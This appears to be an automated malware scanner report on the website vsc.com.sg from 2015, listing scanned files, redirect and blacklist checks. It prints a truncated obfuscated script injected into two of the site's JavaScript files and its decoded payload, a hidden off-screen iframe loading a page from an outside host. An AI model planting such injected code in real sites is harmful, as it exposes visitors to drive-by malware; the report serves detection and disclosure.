Malware Scanner report for vsc.com.sg

Malicious/Suspicious/Total urls checked: 1/1/17
2 pages have malicious or suspicious code. See details below.
Blacklists: OK
Malicious Redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request / Server response / Status
http://vsc.com.sg/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:57 GMT
Location: http://vsc.com.sg/main
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
clean
http://vsc.com.sg/main
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:59 GMT
Location: http://vsc.com.sg/main/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
clean
http://vsc.com.sg/main/
200 OK
Content-Length: 62438
Content-Type: text/html
clean
http://vsc.com.sg/main/media/system/js/mootools-core.js
200 OK
Content-Length: 96362
Content-Type: application/javascript
clean
http://vsc.com.sg/main/media/system/js/core.js
200 OK
Content-Length: 4784
Content-Type: application/javascript
clean
http://vsc.com.sg/main/media/system/js/caption.js
200 OK
Content-Length: 2594
Content-Type: application/javascript
suspicious
Suspicious code. Script contains iFrame.

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ffff_listier_ua(){
var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeB
...[2152 bytes skipped]...

Decoded script:


<iframe src="http://tratramelly.nflix.co/gsatersyutriujf8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe>

http://vsc.com.sg/main/media/system/js/mootools-more.js
200 OK
Content-Length: 238331
Content-Type: application/javascript
clean
http://vsc.com.sg/main/plugins/system/rokbox/assets/js/rokbox.js
200 OK
Content-Length: 55369
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-totop.js
200 OK
Content-Length: 378
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-smartload.js
200 OK
Content-Length: 2815
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-buildspans.js
200 OK
Content-Length: 698
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/gantry-inputs.js
200 OK
Content-Length: 3880
Content-Type: application/javascript
clean
http://vsc.com.sg/main/libraries/gantry/js/browser-engines.js
200 OK
Content-Length: 2662
Content-Type: application/javascript
clean
http://vsc.com.sg/main/templates/rt_clarion/js/load-transition.js
200 OK
Content-Length: 2571
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function ffff_listier_ua(){
var nevernList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Fire
... 1488 bytes are skipped ...
body = document.id('rt-transition');
if (Browser.Engine.gecko19 || (Browser.Engine.trident && !Browser.Engine.trident7)){
if (body){
body.set('tween', {duration: 800, transition: 'quad:out'});
body.setStyles({'visibility': 'hidden', 'opacity': 0});
body.removeClass('rt-hidden').fade('in');
}

return;
}

if (body) body.removeClass('rt-hidden').addClass('rt-visible');
};
window.addEvent('load', animation);
})());

Decoded script:


<iframe src="http://tratramelly.nflix.co/gsatersyutriujf8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe>

Antivirus reports:

Avast / JS:Iframe-EHG [Trj]
DrWeb / JS.IFrame.566
Microsoft / Trojan:JS/Iframe.DI
Fortinet / JS/IFrame.XX!tr

http://vsc.com.sg/main/modules/mod_roknavmenu/themes/fusion/js/fusion.js
200 OK
Content-Length: 26565
Content-Type: application/javascript
clean
http://vsc.com.sg//ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js/
404 Not Found
Content-Length: 326
Content-Type: text/html
clean
http://vsc.com.sg/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: vsc.com.sg

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:33:57 GMT
Location: http://vsc.com.sg/main
Server: Apache
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

...230 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: vsc.com.sg
Referer: http://www.google.com/search?q=vsc.com.sg

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=vsc.com.sg

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://vsc.com.sg/

Result: vsc.com.sg is not infected or malware details are not published yet.